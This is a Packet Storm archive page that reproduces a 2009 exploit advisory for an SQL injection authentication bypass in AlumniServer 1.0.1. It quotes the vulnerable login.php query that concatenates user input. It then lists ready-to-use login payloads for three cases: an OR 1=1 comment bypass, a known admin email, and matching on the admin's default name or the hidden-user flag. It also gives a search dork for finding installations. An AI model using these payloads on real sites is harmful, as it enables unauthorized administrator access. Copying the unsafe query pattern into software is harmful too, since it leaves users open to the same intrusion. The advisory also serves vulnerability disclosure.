what you don't know can hurt you

AlumniServer 1.0.1 SQL Injection

AlumniServer 1.0.1 SQL Injection
Posted Jun 25, 2009
Authored by YEnH4ckEr

AlumniServer version 1.0.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection
MD5 | ff8c1d91ed10053dfb52c799a161df7d

AlumniServer 1.0.1 SQL Injection

Change Mirror Download
---------------------------------------------------------
SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1-->
---------------------------------------------------------

CMS INFORMATION:

-->WEB: http://www.alumniserver.net/
-->DOWNLOAD: http://www.alumniserver.net/
-->DEMO: N/A
-->CATEGORY: CMS/Education
-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
and companies. Services for usersinclude profile page,...
-->RELEASED: 2009-06-11

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "AlumniServer project"
-->CATEGORY: AUTH-BYPASS (SQLi)
-->AFFECT VERSION: CURRENT
-->Discovered Bug date: 2009-06-16
-->Reported Bug date: 2009-06-16
-->Fixed bug date: N/A
-->Info patch (????): N/A
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#####################
////////////////////

AUTH-BYPASS (SQLi):

////////////////////
#####################



<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>



-----------
VULN FILE:
-----------



Path --> [HOME_PATH]/login.php
Lines --> 26, 32, 72


//Note: requestVar is a function against LFI and XSS mainly,
//avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars.


...

26: $email=requestVar('login','',true);

...

32: $pwd=requestVar('password','',true);

...

72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE '".md5($pwd)."') LIMIT 1",$dbh); <-- Vuln line

...


-----------
EXPLOITS:
-----------



[!!!] Case-1: If only one user (rarely)...


~~~~~> E-Mail=y3nh4ck3r@gmail.com') OR 1=1 /*
~~~~~> Password=nothing


[!!!] Case-2: If more users...


[++] Note: Search mail for admin (http://[HOST]/[PATH]/Imprint.php):


~~~~~> E-Mail=[real_admin_mail]')/*
~~~~~> Password=nothing


[++] Note: Search for first or second name.
[++] Note: AdminGn, AdminSn By default. Not use id because it's generated randomly. With a registered user
is easy to get necessary information.


~~~~~> E-Mail=y3nh4ck3r@gmail.com') OR gn='AdminGn' /*
~~~~~> Password=nothing


[!!!] Case-3: If admin is a hidden user...


~~~~~> E-Mail=y3nh4ck3r@gmail.com') OR hideuser='y' /*
~~~~~> Password=nothing




#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close